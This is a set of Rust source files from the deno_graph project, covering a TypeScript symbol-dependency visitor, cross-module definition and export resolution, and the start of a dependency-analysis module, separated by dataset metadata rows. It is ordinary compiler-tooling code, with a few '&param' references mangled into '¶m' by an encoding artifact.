self.visit_expr(&n.key);
}
self.visit_ts_fn_param(&n.param);
}
fn visit_ts_method_signature(&mut self, n: &TsMethodSignature) {
if n.computed {
self.visit_expr(&n.key);
}
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_ts_fn_param(param)
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
fn visit_class(&mut self, n: &Class) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
if let Some(expr) = &n.super_class {
self.visit_expr(expr);
}
if let Some(type_params) = &n.super_type_params {
self.visit_ts_type_param_instantiation(type_params)
}
for expr in &n.implements {
self.visit_ts_expr_with_type_args(expr);
}
}
fn visit_ts_enum_decl(&mut self, n: &TsEnumDecl) {
for member in &n.members {
if let Some(init) = &member.init {
self.visit_expr(init);
}
}
}
fn visit_function(&mut self, n: &Function) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_param(param);
}
if let Some(return_type) = &n.return_type {
self.visit_ts_type_ann(return_type);
}
}
fn visit_arrow_expr(&mut self, n: &ArrowExpr) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_pat(param);
}
if let Some(return_type) = &n.return_type {
self.visit_ts_type_ann(return_type);
} else if let BlockStmtOrExpr::Expr(expr) = &*n.body {
self.visit_expr(expr);
}
}
fn visit_ts_interface_decl(&mut self, n: &TsInterfaceDecl) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for extends in &n.extends {
self.visit_ts_expr_with_type_args(extends);
}
}
fn visit_ts_type_alias_decl(&mut self, n: &TsTypeAliasDecl) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
self.visit_ts_type(&n.type_ann)
}
fn visit_var_declarator(&mut self, n: &VarDeclarator) {
self.visit_pat(&n.name);
if !pat_has_type_ann(&n.name)
&& let Some(init) = &n.init
{
let visited_type_assertion = self.visit_type_if_type_assertion(init);
if !visited_type_assertion && self.mode.visit_exprs() {
self.visit_expr(init);
}
}
}
fn visit_prop_name(&mut self, key: &PropName) {
match key {
PropName::Computed(computed) => {
self.visit_expr(&computed.expr);
}
// property name idents aren't a dep
PropName::Ident(_)
| PropName::Str(_)
| PropName::Num(_)
| PropName::BigInt(_) => {
// ignore
}
}
}
fn visit_ts_expr_with_type_args(&mut self, n: &TsExprWithTypeArgs) {
if let Some(type_args) = &n.type_args {
self.visit_ts_type_param_instantiation(type_args);
}
// visit this expr unconditionally because it's in a TsExprWithTypeArgs
self.visit_expr(&n.expr);
}
fn visit_ts_type_param_decl(&mut self, type_params: &TsTypeParamDecl) {
for param in &type_params.params {
self.visit_ts_type_param(param);
}
}
fn visit_ts_type_param(&mut self, param: &TsTypeParam) {
if let Some(constraint) = ¶m.constraint {
self.visit_ts_type(constraint);
}
if let Some(default) = ¶m.default {
self.visit_ts_type(default);
}
}
fn visit_ts_type_param_instantiation(
&mut self,
type_params: &TsTypeParamInstantiation,
) {
for param in &type_params.params {
self.visit_ts_type(param);
}
}
fn visit_ts_param_prop(&mut self, param: &TsParamProp) {
match ¶m.param {
TsParamPropParam::Ident(ident) => {
if let Some(type_ann) = &ident.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
TsParamPropParam::Assign(assign) => match &*assign.left {
Pat::Ident(ident) => {
if let Some(type_ann) = &ident.type_ann {
self.visit_ts_type_ann(type_ann)
} else {
self.visit_type_if_type_assertion(&assign.right);
}
}
_ => {
unreachable!();
}
},
}
}
fn visit_param(&mut self, param: &Param) {
self.visit_pat(¶m.pat);
}
fn visit_pat(&mut self, pat: &Pat) {
match pat {
Pat::Ident(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Array(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Rest(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Object(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
}
}
Pat::Assign(n) => {
self.visit_pat(&n.left);
if !pat_has_type_ann(&n.left) {
let visited_type_assertion =
self.visit_type_if_type_assertion(&n.right);
if !visited_type_assertion && self.mode.visit_exprs() {
self.visit_expr(&n.right);
}
}
}
Pat::Invalid(_) => {
// ignore
}
Pat::Expr(expr) => {
if self.mode.visit_exprs() {
self.visit_expr(expr);
}
}
}
}
fn visit_expr(&mut self, n: &Expr) {
match expr_into_id_and_parts(n) {
Some((id, parts)) => {
if parts.is_empty() {
self.deps.push(SymbolNodeDep::Id(id))
} else {
self.deps.push(SymbolNodeDep::QualifiedId(id, parts))
}
}
_ => {
n.visit_children_with(self);
}
}
}
fn visit_ident(&mut self, n: &Ident) {
let id = n.to_id();
self.deps.push(id.into());
}
fn visit_binding_ident(&mut self, n: &BindingIdent) {
// skip over the ident because it's not a dep
n.type_ann.visit_with(self);
}
fn visit_member_expr(&mut self, n: &MemberExpr) {
match member_expr_into_id_and_parts(n) {
Some((id, parts)) => {
self.deps.push(SymbolNodeDep::QualifiedId(id, parts))
}
_ => {
n.visit_children_with(self);
}
}
}
fn visit_ts_tuple_element(&mut self, n: &TsTupleElement) {
n.ty.visit_with(self);
}
fn visit_ts_import_type(&mut self, n: &TsImportType) {
let parts = match &n.qualifier {
Some(qualifier) => {
let (leftmost_id, mut parts) = ts_entity_name_to_parts(qualifier);
parts.insert(0, leftmost_id.0.to_string());
parts
}
None => Vec::new(),
};
self.deps.push(SymbolNodeDep::ImportType(
n.arg.value.to_string_lossy().to_string(),
parts,
));
n.type_args.visit_with(self);
}
fn visit_ts_qualified_name(&mut self, n: &TsQualifiedName) {
let (id, parts) = ts_qualified_name_parts(n);
self.deps.push(SymbolNodeDep::QualifiedId(id, parts));
}
fn visit_ts_type_ann(&mut self, type_ann: &TsTypeAnn) {
self.visit_ts_type(&type_ann.type_ann)
}
fn visit_ts_type_assertion(&mut self, n: &TsTypeAssertion) {
self.visit_ts_type(&n.type_ann);
}
fn visit_ts_as_expr(&mut self, n: &TsAsExpr) {
self.visit_ts_type(&n.type_ann);
}
}
fn pat_has_type_ann(n: &Pat) -> bool {
match n {
Pat::Ident(n) => n.type_ann.is_some(),
Pat::Array(n) => n.type_ann.is_some(),
Pat::Rest(n) => n.type_ann.is_some(),
Pat::Object(n) => n.type_ann.is_some(),
Pat::Assign(n) => pat_has_type_ann(&n.left),
Pat::Invalid(_) => false,
Pat::Expr(_) => false,
}
}
fn expr_into_id_and_parts(expr: &Expr) -> Option<(Id, Vec<String>)> {
match expr {
Expr::Member(member) => member_expr_into_id_and_parts(member),
Expr::Ident(ident) => Some((ident.to_id(), vec![])),
_ => None,
}
}
fn member_expr_into_id_and_parts(
member: &MemberExpr,
) -> Option<(Id, Vec<String>)> {
fn member_prop_to_str(member_prop: &MemberProp) -> Option<String> {
match member_prop {
MemberProp::Ident(ident) => Some(ident.sym.to_string()),
MemberProp::PrivateName(n) => Some(format!("#{}", n.name)),
MemberProp::Computed(n) => match &*n.expr {
Expr::Lit(Lit::Str(str)) => str.value.as_str().map(ToOwned::to_owned),
_ => None,
},
}
}
let (id, mut parts) = expr_into_id_and_parts(&member.obj)?;
parts.push(member_prop_to_str(&member.prop)?);
Some((id, parts))
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/cross_module.rs | src/symbols/cross_module.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::HashSet;
use std::collections::VecDeque;
use deno_ast::SourceRange;
use indexmap::IndexMap;
use crate::ModuleGraph;
use crate::ModuleSpecifier;
use super::FileDep;
use super::FileDepName;
use super::ModuleInfoRef;
use super::Symbol;
use super::SymbolDecl;
use super::SymbolId;
use super::SymbolNodeDep;
use super::UniqueSymbolId;
use super::analyzer::SymbolDeclKind;
#[derive(Debug, Clone)]
pub enum DefinitionOrUnresolved<'a> {
Definition(Definition<'a>),
Unresolved(DefinitionUnresolved<'a>),
}
impl<'a> DefinitionOrUnresolved<'a> {
pub fn module(&self) -> ModuleInfoRef<'a> {
match self {
DefinitionOrUnresolved::Definition(def) => def.module,
DefinitionOrUnresolved::Unresolved(unresolved) => unresolved.module,
}
}
pub fn symbol(&self) -> Option<&'a Symbol> {
match self {
DefinitionOrUnresolved::Definition(def) => Some(def.symbol),
DefinitionOrUnresolved::Unresolved(_) => None,
}
}
}
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub enum DefinitionKind<'a> {
ExportStar(&'a FileDep),
Definition,
}
#[derive(Debug, Clone)]
pub struct Definition<'a> {
pub kind: DefinitionKind<'a>,
pub module: ModuleInfoRef<'a>,
pub symbol: &'a Symbol,
pub symbol_decl: &'a SymbolDecl,
}
impl Definition<'_> {
pub fn range(&self) -> &SourceRange {
&self.symbol_decl.range
}
pub fn byte_range(&self) -> std::ops::Range<usize> {
self
.range()
.as_byte_range(self.module.text_info().range().start)
}
pub fn text(&self) -> &str {
self.module.text_info().range_text(self.range())
}
}
#[derive(Debug, Clone)]
pub enum DefinitionUnresolvedKind {
/// Could not resolve the swc Id.
Id(deno_ast::swc::ast::Id),
/// Could not resolve the specifier relative to this module via deno_graph.
Specifier(String),
/// Could not resolve the part on the symbol.
Part(String),
}
/// The point at which a definition could not be resolved.
#[derive(Debug, Clone)]
pub struct DefinitionUnresolved<'a> {
pub module: ModuleInfoRef<'a>,
pub kind: DefinitionUnresolvedKind,
pub parts: Vec<String>,
}
#[derive(Debug, Clone)]
pub struct DefinitionPathLink<'a> {
pub module: ModuleInfoRef<'a>,
pub symbol: &'a Symbol,
pub symbol_decl: &'a SymbolDecl,
pub parts: Vec<String>,
pub next: Vec<DefinitionPathNode<'a>>,
}
#[derive(Debug, Clone)]
pub enum DefinitionPathNodeResolved<'a> {
Link(DefinitionPathLink<'a>),
Definition(Definition<'a>),
}
impl<'a> DefinitionPathNodeResolved<'a> {
pub fn symbol(&self) -> Option<&'a Symbol> {
match self {
Self::Link(link) => Some(link.symbol),
Self::Definition(def) => Some(def.symbol),
}
}
pub fn module(&self) -> ModuleInfoRef<'a> {
match self {
Self::Link(link) => link.module,
Self::Definition(def) => def.module,
}
}
}
/// A graph path to a definition.
#[derive(Debug, Clone)]
pub enum DefinitionPathNode<'a> {
Resolved(DefinitionPathNodeResolved<'a>),
Unresolved(DefinitionUnresolved<'a>),
}
impl<'a> DefinitionPathNode<'a> {
fn definition(definition: Definition<'a>) -> Self {
Self::Resolved(DefinitionPathNodeResolved::Definition(definition))
}
fn link(link: DefinitionPathLink<'a>) -> Self {
Self::Resolved(DefinitionPathNodeResolved::Link(link))
}
pub fn module(&self) -> ModuleInfoRef<'a> {
match self {
Self::Resolved(resolved) => resolved.module(),
Self::Unresolved(unresolved) => unresolved.module,
}
}
pub fn into_definitions(self) -> impl Iterator<Item = Definition<'a>> {
self
.into_definitions_or_unresolveds()
.filter_map(|d| match d {
DefinitionOrUnresolved::Definition(d) => Some(d),
DefinitionOrUnresolved::Unresolved(_) => None,
})
}
pub fn into_definitions_or_unresolveds(
self,
) -> impl Iterator<Item = DefinitionOrUnresolved<'a>> {
struct IntoIterator<'a> {
queue: VecDeque<DefinitionPathNode<'a>>,
}
impl<'a> Iterator for IntoIterator<'a> {
type Item = DefinitionOrUnresolved<'a>;
fn next(&mut self) -> Option<Self::Item> {
while let Some(path) = self.queue.pop_front() {
match path {
DefinitionPathNode::Resolved(DefinitionPathNodeResolved::Link(
link,
)) => {
for child_path in link.next.into_iter().rev() {
self.queue.push_front(child_path);
}
}
DefinitionPathNode::Resolved(
DefinitionPathNodeResolved::Definition(def),
) => {
return Some(DefinitionOrUnresolved::Definition(def));
}
DefinitionPathNode::Unresolved(unresolved) => {
return Some(DefinitionOrUnresolved::Unresolved(unresolved));
}
}
}
None
}
}
IntoIterator {
queue: VecDeque::from([self]),
}
}
}
/// Finds the path to a definition.
pub fn find_definition_paths<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
symbol: &'a Symbol,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
find_definition_paths_internal(
module_graph,
module,
symbol,
&mut Default::default(),
specifier_to_module,
)
}
fn find_definition_paths_internal<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
symbol: &'a Symbol,
visited_symbols: &mut HashSet<UniqueSymbolId>,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
debug_assert_eq!(module.module_id(), symbol.module_id());
if !visited_symbols.insert(symbol.unique_id()) {
return Vec::new();
}
let mut paths = Vec::with_capacity(symbol.decls().len());
for decl in symbol.decls() {
match &decl.kind {
SymbolDeclKind::Definition(_) => {
paths.push(DefinitionPathNode::definition(Definition {
module,
symbol,
symbol_decl: decl,
kind: DefinitionKind::Definition,
}));
}
SymbolDeclKind::Target(target_id) => {
if let Some(symbol) = module
.esm()
.unwrap()
.symbol_id_from_swc(target_id)
.and_then(|id| module.symbol(id))
{
let inner_paths = find_definition_paths_internal(
module_graph,
module,
symbol,
visited_symbols,
specifier_to_module,
);
if !inner_paths.is_empty() {
paths.push(DefinitionPathNode::link(DefinitionPathLink {
module,
symbol,
symbol_decl: decl,
parts: Vec::new(),
next: inner_paths,
}));
}
}
}
SymbolDeclKind::QualifiedTarget(target_id, parts) => {
let inner_paths = go_to_id_and_parts_definition_paths(
module_graph,
module,
target_id,
parts,
specifier_to_module,
);
if !inner_paths.is_empty() {
paths.push(DefinitionPathNode::link(DefinitionPathLink {
module,
symbol,
symbol_decl: decl,
parts: parts.clone(),
next: inner_paths,
}));
}
}
SymbolDeclKind::FileRef(file_ref) => match &file_ref.name {
FileDepName::Star => {
paths.push(DefinitionPathNode::definition(Definition {
module,
symbol,
kind: DefinitionKind::ExportStar(file_ref),
symbol_decl: decl,
}));
}
FileDepName::Name(export_name) => {
let inner_paths = go_to_file_export(
module_graph,
module,
file_ref,
export_name,
specifier_to_module,
visited_symbols,
);
if !inner_paths.is_empty() {
paths.push(DefinitionPathNode::link(DefinitionPathLink {
module,
symbol,
symbol_decl: decl,
parts: Vec::new(),
next: inner_paths,
}));
}
}
},
}
}
paths
}
fn go_to_file_export<'a>(
module_graph: &'a ModuleGraph,
referrer_module: ModuleInfoRef<'a>,
file_ref: &'a FileDep,
export_name: &'a str,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
visited_symbols: &mut HashSet<UniqueSymbolId>,
) -> Vec<DefinitionPathNode<'a>> {
let maybe_dep_module = module_graph
.resolve_dependency(
&file_ref.specifier,
referrer_module.specifier(),
/* prefer types */ true,
)
.and_then(specifier_to_module);
let Some(dep_module) = maybe_dep_module else {
return vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
module: referrer_module,
kind: DefinitionUnresolvedKind::Specifier(file_ref.specifier.clone()),
parts: Vec::new(),
})];
};
let maybe_export_symbol = dep_module
.module_symbol()
.exports()
.get(export_name)
.and_then(|symbol_id| dep_module.symbol(*symbol_id));
match maybe_export_symbol {
Some(export_symbol) => find_definition_paths_internal(
module_graph,
dep_module,
export_symbol,
visited_symbols,
specifier_to_module,
),
None => {
// maybe it's in a re-export
if let Some(re_export_all_specifiers) =
dep_module.re_export_all_specifiers()
{
for re_export_specifier in re_export_all_specifiers {
let maybe_specifier = module_graph.resolve_dependency(
re_export_specifier,
dep_module.specifier(),
/* prefer_types */ true,
);
let maybe_module = maybe_specifier.and_then(specifier_to_module);
let mut visited = HashSet::new();
if let Some(module) = maybe_module {
// todo(dsherret): this could be optimized to use an iterator
let inner = exports_and_re_exports_inner(
module_graph,
module,
specifier_to_module,
&mut visited,
);
for (name, item) in inner.resolved {
if name == export_name {
let resolved_rexport = item.as_resolved_export();
let paths = find_definition_paths_internal(
module_graph,
resolved_rexport.module,
resolved_rexport.symbol(),
visited_symbols,
specifier_to_module,
);
if !paths.is_empty() {
return paths;
}
break;
}
}
}
}
}
vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
module: dep_module,
kind: DefinitionUnresolvedKind::Part(export_name.to_string()),
parts: Vec::new(),
})]
}
}
}
/// A resolved `SymbolDep`.
#[derive(Debug)]
pub enum ResolvedSymbolDepEntry<'a> {
/// The path to the definition of the symbol dep.
Path(DefinitionPathNode<'a>),
/// If the symbol dep was an import type with no property access.
///
/// Ex. `type MyType = typeof import("./my_module.ts");`
ImportType(ModuleInfoRef<'a>),
}
pub fn resolve_symbol_dep<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
dep: &SymbolNodeDep,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<ResolvedSymbolDepEntry<'a>> {
match dep {
SymbolNodeDep::Id(id) => {
if let Some(dep_symbol) = module.esm().and_then(|m| m.symbol_from_swc(id))
{
find_definition_paths(
module_graph,
module,
dep_symbol,
specifier_to_module,
)
.into_iter()
.map(ResolvedSymbolDepEntry::Path)
.collect()
} else {
vec![ResolvedSymbolDepEntry::Path(
DefinitionPathNode::Unresolved(DefinitionUnresolved {
module,
kind: DefinitionUnresolvedKind::Id(id.clone()),
parts: Vec::new(),
}),
)]
}
}
SymbolNodeDep::QualifiedId(id, parts) => {
go_to_id_and_parts_definition_paths(
module_graph,
module,
id,
parts,
specifier_to_module,
)
.into_iter()
.map(ResolvedSymbolDepEntry::Path)
.collect()
}
SymbolNodeDep::ImportType(import_specifier, parts) => {
let maybe_dep_specifier = module_graph.resolve_dependency(
import_specifier,
module.specifier(),
/* prefer types */ true,
);
let maybe_module = maybe_dep_specifier.and_then(specifier_to_module);
let Some(module) = maybe_module else {
return vec![ResolvedSymbolDepEntry::Path(
DefinitionPathNode::Unresolved(DefinitionUnresolved {
module,
kind: DefinitionUnresolvedKind::Specifier(import_specifier.clone()),
parts: parts.clone(),
}),
)];
};
if parts.is_empty() {
// an ImportType includes default exports
vec![ResolvedSymbolDepEntry::ImportType(module)]
} else {
resolve_qualified_export_name(
module_graph,
module,
parts,
specifier_to_module,
)
.into_iter()
.map(ResolvedSymbolDepEntry::Path)
.collect()
}
}
}
}
fn go_to_id_and_parts_definition_paths<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
target_id: &deno_ast::swc::ast::Id,
parts: &[String],
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
if let Some(symbol_id) =
module.esm().and_then(|m| m.symbol_id_from_swc(target_id))
{
resolve_qualified_name(
module_graph,
module,
module.symbol(symbol_id).unwrap(),
parts,
specifier_to_module,
)
} else {
vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
module,
kind: DefinitionUnresolvedKind::Id(target_id.clone()),
parts: parts.to_vec(),
})]
}
}
fn resolve_qualified_export_name<'a>(
graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
parts: &[String],
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
debug_assert!(!parts.is_empty());
resolve_qualified_export_name_internal(
graph,
module,
parts,
&mut HashSet::new(),
specifier_to_module,
)
}
fn resolve_qualified_export_name_internal<'a>(
graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
parts: &[String],
visited_symbols: &mut HashSet<UniqueSymbolId>,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
debug_assert!(!parts.is_empty());
let exports = exports_and_re_exports(graph, module, specifier_to_module);
let export_name = &parts[0];
if let Some(resolved) = exports.resolved.get(export_name) {
let resolved = resolved.as_resolved_export();
resolve_qualified_name_internal(
graph,
resolved.module,
resolved.symbol(),
&parts[1..],
visited_symbols,
specifier_to_module,
)
} else {
vec![DefinitionPathNode::Unresolved(DefinitionUnresolved {
module,
kind: DefinitionUnresolvedKind::Part(export_name.to_string()),
parts: parts.to_vec(),
})]
}
}
pub fn resolve_qualified_name<'a>(
graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
symbol: &'a Symbol,
parts: &[String],
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
resolve_qualified_name_internal(
graph,
module,
symbol,
parts,
&mut HashSet::new(),
specifier_to_module,
)
}
fn resolve_qualified_name_internal<'a>(
graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
symbol: &'a Symbol,
parts: &[String],
visited_symbols: &mut HashSet<UniqueSymbolId>,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
fn resolve_paths_with_parts<'a>(
paths: Vec<DefinitionPathNode<'a>>,
parts: &[String],
graph: &'a ModuleGraph,
visited_symbols: &mut HashSet<UniqueSymbolId>,
specifier_to_module: &impl Fn(&url::Url) -> Option<ModuleInfoRef<'a>>,
) -> Vec<DefinitionPathNode<'a>> {
debug_assert!(!parts.is_empty());
paths
.into_iter()
.flat_map(|path| {
resolve_path_with_parts(
path,
parts,
graph,
visited_symbols,
specifier_to_module,
)
})
.collect()
}
fn resolve_path_with_parts<'a>(
path: DefinitionPathNode<'a>,
parts: &[String],
graph: &'a ModuleGraph,
visited_symbols: &mut HashSet<UniqueSymbolId>,
specifier_to_module: &impl Fn(&url::Url) -> Option<ModuleInfoRef<'a>>,
) -> Option<DefinitionPathNode<'a>> {
match path {
DefinitionPathNode::Resolved(DefinitionPathNodeResolved::Link(link)) => {
let next = resolve_paths_with_parts(
link.next,
parts,
graph,
visited_symbols,
specifier_to_module,
);
if next.is_empty() {
None
} else {
Some(DefinitionPathNode::link(DefinitionPathLink {
module: link.module,
symbol: link.symbol,
symbol_decl: link.symbol_decl,
parts: parts.to_vec(),
next,
}))
}
}
DefinitionPathNode::Resolved(DefinitionPathNodeResolved::Definition(
definition,
)) => {
let next_part = &parts[0];
let mut next = Vec::new();
match definition.kind {
DefinitionKind::Definition => {
if let Some(export_symbol_id) = definition.symbol.export(next_part)
{
next.extend(resolve_qualified_name_internal(
graph,
definition.module,
definition.module.symbol(export_symbol_id).unwrap(),
&parts[1..],
visited_symbols,
specifier_to_module,
));
} else if next_part == "prototype"
&& definition.symbol_decl.is_class()
{
// for now, just resolve to this definition
debug_assert!(next.is_empty());
return Some(DefinitionPathNode::definition(definition.clone()));
} else {
next.push(DefinitionPathNode::Unresolved(DefinitionUnresolved {
module: definition.module,
kind: DefinitionUnresolvedKind::Part(next_part.to_string()),
parts: parts.to_vec(),
}))
}
}
DefinitionKind::ExportStar(file_dep) => {
let maybe_dep_specifier = graph.resolve_dependency(
&file_dep.specifier,
definition.module.specifier(),
/* prefer types */ true,
);
let specifier_module =
maybe_dep_specifier.and_then(specifier_to_module);
if let Some(module) = specifier_module {
next.extend(resolve_qualified_export_name_internal(
graph,
module,
parts,
visited_symbols,
specifier_to_module,
));
} else {
next.push(DefinitionPathNode::Unresolved(DefinitionUnresolved {
module: definition.module,
kind: DefinitionUnresolvedKind::Specifier(
file_dep.specifier.to_string(),
),
parts: parts.to_vec(),
}))
}
}
}
if next.is_empty() {
None
} else {
// convert the definition into a path because the qualified name has yet to be resolved
Some(DefinitionPathNode::link(DefinitionPathLink {
module: definition.module,
symbol: definition.symbol,
symbol_decl: definition.symbol_decl,
parts: parts.to_vec(),
next,
}))
}
}
DefinitionPathNode::Unresolved(unresolved) => {
Some(DefinitionPathNode::Unresolved(unresolved))
}
}
}
let paths = find_definition_paths_internal(
graph,
module,
symbol,
visited_symbols,
specifier_to_module,
);
if !parts.is_empty() {
resolve_paths_with_parts(
paths,
parts,
graph,
visited_symbols,
specifier_to_module,
)
} else {
paths
}
}
#[derive(Debug, Default, Clone)]
pub struct ModuleExports<'a> {
pub resolved: IndexMap<String, ResolvedExportOrReExportAllPath<'a>>,
pub unresolved_specifiers: Vec<UnresolvedSpecifier<'a>>,
}
/// A resolved export. This lands at the first symbol it finds, which is not
/// necessarily the declaration symbol. For example, this might be the symbol
/// for an identifier in an export declaration (ex. `export { foo }`).
#[derive(Debug, Clone)]
pub struct ResolvedExport<'a> {
pub module: ModuleInfoRef<'a>,
pub symbol_id: SymbolId,
}
impl<'a> ResolvedExport<'a> {
pub fn symbol(&self) -> &'a Symbol {
self.module.symbol(self.symbol_id).unwrap()
}
}
#[derive(Debug, Clone)]
pub struct ResolvedReExportAllPath<'a> {
/// Module that contains this re-export.
pub referrer_module: ModuleInfoRef<'a>,
/// Specifier from the referrer that led to the resolved module.
pub specifier: &'a str,
/// Holds the next resolved export or re-export.
pub next: Box<ResolvedExportOrReExportAllPath<'a>>,
}
impl ResolvedReExportAllPath<'_> {
pub fn resolved_module(&self) -> ModuleInfoRef<'_> {
match &*self.next {
ResolvedExportOrReExportAllPath::Export(e) => e.module,
ResolvedExportOrReExportAllPath::ReExportAllPath(e) => e.referrer_module,
}
}
}
#[derive(Debug, Clone)]
pub enum ResolvedExportOrReExportAllPath<'a> {
Export(ResolvedExport<'a>),
ReExportAllPath(ResolvedReExportAllPath<'a>),
}
impl<'a> ResolvedExportOrReExportAllPath<'a> {
pub fn as_resolved_export(&self) -> &ResolvedExport<'a> {
match self {
ResolvedExportOrReExportAllPath::Export(export) => export,
ResolvedExportOrReExportAllPath::ReExportAllPath(re_export) => {
re_export.next.as_resolved_export()
}
}
}
pub fn iter(
&self,
) -> impl Iterator<Item = &ResolvedExportOrReExportAllPath<'a>> {
std::iter::successors(Some(self), |last| match last {
ResolvedExportOrReExportAllPath::Export(_) => None,
ResolvedExportOrReExportAllPath::ReExportAllPath(re_export) => {
Some(&re_export.next)
}
})
}
}
#[derive(Debug, Clone)]
pub struct UnresolvedSpecifier<'a> {
pub referrer: ModuleInfoRef<'a>,
pub specifier: &'a str,
}
pub fn exports_and_re_exports<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
) -> ModuleExports<'a> {
exports_and_re_exports_inner(
module_graph,
module,
specifier_to_module,
&mut Default::default(),
)
}
fn exports_and_re_exports_inner<'a>(
module_graph: &'a ModuleGraph,
module: ModuleInfoRef<'a>,
specifier_to_module: &impl Fn(&ModuleSpecifier) -> Option<ModuleInfoRef<'a>>,
visited: &mut HashSet<&'a ModuleSpecifier>,
) -> ModuleExports<'a> {
if !visited.insert(module.specifier()) {
return ModuleExports::default();
}
let mut unresolved_specifiers = Vec::new();
let mut resolved = IndexMap::new();
for (name, symbol_id) in module.module_symbol().exports() {
resolved.insert(
name.clone(),
ResolvedExportOrReExportAllPath::Export(ResolvedExport {
module,
symbol_id: *symbol_id,
}),
);
}
if let Some(re_export_all_specifier) = module.re_export_all_specifiers() {
let referrer_module = module;
for re_export_specifier in re_export_all_specifier {
let maybe_specifier = module_graph.resolve_dependency(
re_export_specifier,
module.specifier(),
/* prefer_types */ true,
);
let maybe_module = maybe_specifier.and_then(specifier_to_module);
if let Some(module) = maybe_module {
let inner = exports_and_re_exports_inner(
module_graph,
module,
specifier_to_module,
visited,
);
for (name, item) in inner.resolved {
if name != "default" && !resolved.contains_key(&name) {
resolved.insert(
name,
ResolvedExportOrReExportAllPath::ReExportAllPath(
ResolvedReExportAllPath {
referrer_module,
specifier: re_export_specifier,
next: Box::new(item),
},
),
);
}
}
unresolved_specifiers.extend(inner.unresolved_specifiers);
} else {
unresolved_specifiers.push(UnresolvedSpecifier {
referrer: module,
specifier: re_export_specifier,
});
}
}
}
ModuleExports {
resolved,
unresolved_specifiers,
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/ast/dep.rs | src/ast/dep.rs | use std::collections::HashMap;
use deno_ast::MultiThreadedComments;
use deno_ast::ProgramRef;
use deno_ast::SourcePos;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::swc::ast;
use deno_ast::swc::ast::Callee;
use deno_ast::swc::ast::Expr;
use deno_ast::swc::ast::ImportPhase;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::common::comments::CommentKind;
use deno_ast::swc::ecma_visit::Visit;
use deno_ast::swc::ecma_visit::VisitWith;
use crate::analysis::DynamicDependencyKind;
use crate::analysis::ImportAttribute;
use crate::analysis::ImportAttributes;
use crate::analysis::StaticDependencyKind;
pub fn analyze_program_dependencies(
program: ProgramRef,
comments: &MultiThreadedComments,
) -> Vec<DependencyDescriptor> {
let mut v = DependencyCollector {
comments,
items: vec![],
};
match program {
ProgramRef::Module(n) => n.visit_with(&mut v),
ProgramRef::Script(n) => n.visit_with(&mut v),
}
v.items
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct DependencyComment {
pub kind: CommentKind,
pub range: SourceRange,
pub text: Atom,
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum DependencyDescriptor {
Static(StaticDependencyDescriptor),
Dynamic(DynamicDependencyDescriptor),
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct StaticDependencyDescriptor {
pub kind: StaticDependencyKind,
